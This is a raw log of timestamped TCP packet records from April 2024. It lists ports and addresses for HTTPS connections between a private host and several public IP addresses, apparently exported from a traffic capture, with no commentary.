Apr 30, 2024 07:59:13.390094995 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 30, 2024 07:59:17.406210899 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 30, 2024 07:59:17.780682087 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 30, 2024 07:59:17.874433041 CEST	49674	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:17.874449968 CEST	49675	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:18.015081882 CEST	49672	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:18.202552080 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 30, 2024 07:59:18.530692101 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 30, 2024 07:59:19.371774912 CEST	443	49698	104.98.116.138	192.168.2.7
Apr 30, 2024 07:59:19.371933937 CEST	49698	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:20.030736923 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 30, 2024 07:59:23.015759945 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 30, 2024 07:59:27.892983913 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 30, 2024 07:59:28.968204021 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 30, 2024 07:59:32.041363001 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.041407108 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.041502953 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.043067932 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.043087006 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.261341095 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.261415958 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.627995014 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.628021002 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.628412008 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.628473043 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.631181955 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.641200066 CEST	49698	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:32.641303062 CEST	49698	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:32.641680956 CEST	49707	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:32.641726971 CEST	443	49707	104.98.116.138	192.168.2.7
Apr 30, 2024 07:59:32.641832113 CEST	49707	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:32.676139116 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.752132893 CEST	49707	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:32.752150059 CEST	443	49707	104.98.116.138	192.168.2.7
Apr 30, 2024 07:59:32.779222965 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779273987 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779305935 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779321909 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779323101 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779355049 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779376030 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779408932 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779414892 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779449940 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779483080 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779484034 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779484034 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779493093 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779541969 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779572010 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779575109 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779575109 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779582977 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779619932 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779619932 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.779628038 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.779741049 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.791393042 CEST	443	49698	104.98.116.138	192.168.2.7
Apr 30, 2024 07:59:32.791409969 CEST	443	49698	104.98.116.138	192.168.2.7
Apr 30, 2024 07:59:32.806289911 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.806369066 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.806452990 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.806572914 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.806593895 CEST	443	49706	104.21.84.67	192.168.2.7
Apr 30, 2024 07:59:32.806636095 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:32.806636095 CEST	49706	443	192.168.2.7	104.21.84.67
Apr 30, 2024 07:59:33.064474106 CEST	443	49707	104.98.116.138	192.168.2.7
Apr 30, 2024 07:59:33.064613104 CEST	49707	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:35.394539118 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.394584894 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.394684076 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.404853106 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.404872894 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.622652054 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.622754097 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.624790907 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.624804974 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.625061035 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.649323940 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.692157030 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872262001 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872319937 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872353077 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872409105 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872441053 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872454882 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.872454882 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.872478008 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872534037 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.872539997 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872572899 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872606993 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872622013 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.872631073 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872664928 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872672081 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.872680902 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.872739077 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.872745991 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.873393059 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.873425007 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.873447895 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.873455048 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.873488903 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.873521090 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.873565912 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.873565912 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.873574972 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.874253035 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.874279022 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.874310017 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.874339104 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.874351025 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.874351025 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.874357939 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.874537945 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.875155926 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.875210047 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.875241995 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.875269890 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.875291109 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.875297070 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.875348091 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.875355005 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.875466108 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.875998974 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.876081944 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.876123905 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.876152992 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.876159906 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.876166105 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.876199961 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.876892090 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.876928091 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.876987934 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.876998901 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.877037048 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.877089977 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.877096891 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.877104044 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.877137899 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.877746105 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.877809048 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.877819061 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.968189001 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.974843025 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.974853039 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.974912882 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.974915981 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.974925041 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.974950075 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.974953890 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.975531101 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.975563049 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.975570917 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.975601912 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.975611925 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.975651026 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.976615906 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.976680994 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.976690054 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.976737022 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.978033066 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.978172064 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.978193045 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.978245974 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.978611946 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.978668928 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.978843927 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.978873014 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.978912115 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.978913069 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.978919983 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.979578972 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.979641914 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.979650021 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.979707003 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.980072975 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.980119944 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.980144024 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.980195999 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.980696917 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.980731010 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.980753899 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.980761051 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:35.980793953 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:35.980804920 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.077428102 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.077464104 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.077523947 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.077536106 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.077627897 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.078046083 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.078119993 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.078126907 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.078133106 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.078195095 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.079006910 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.079035044 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.079088926 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.079088926 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.079097986 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.079174995 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.079863071 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.079899073 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.079936028 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.079942942 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.079955101 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.080018044 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.080791950 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.080821991 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.080883980 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.080883980 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.080890894 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.080934048 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.081676960 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.081708908 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.081746101 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.081753969 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.081772089 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.081861019 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.082571983 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.082622051 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.082664013 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.082664013 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.082672119 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.082741976 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.083424091 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.083452940 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.083483934 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.083491087 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.083530903 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.083530903 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.084394932 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.084428072 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.084487915 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.084494114 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.084538937 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.084538937 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.085272074 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.085302114 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.085325956 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.085333109 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.085372925 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.085372925 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.086169004 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.086199045 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.086225986 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.086232901 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.086266041 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.086297035 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.087104082 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.087234020 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.087986946 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.088023901 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.088063955 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.088071108 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.088116884 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.088116884 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.090619087 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.090641975 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.090704918 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.090713024 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.090753078 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.092314959 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.092344999 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.092432976 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.092432976 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.092441082 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.092571020 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.094136953 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.094156027 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.094212055 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.094218969 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.094264030 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.094264030 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.095985889 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.096020937 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.096070051 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.096076965 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.096092939 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.096169949 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.097851038 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.097866058 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.097920895 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.097929001 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.097965002 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.097965002 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.099734068 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.099750996 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.099812984 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.099819899 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.099873066 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.107352972 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.107670069 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.181278944 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.181298018 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.181370020 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.181385994 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.181427956 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.183075905 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.183089972 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.183167934 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.183176041 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.183250904 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.185173035 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.185188055 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.185270071 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.185277939 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.185350895 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.187067986 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.187082052 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.187155962 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.187164068 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.187232971 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.188776970 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.188791037 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.188858986 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.188868046 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.188915014 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.190663099 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.190682888 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.190730095 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.190737963 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.190778971 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.190778971 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.192270994 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.192286015 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.192398071 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.192405939 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.192481995 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.194474936 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.194489956 CEST	443	49708	104.21.45.138	192.168.2.7
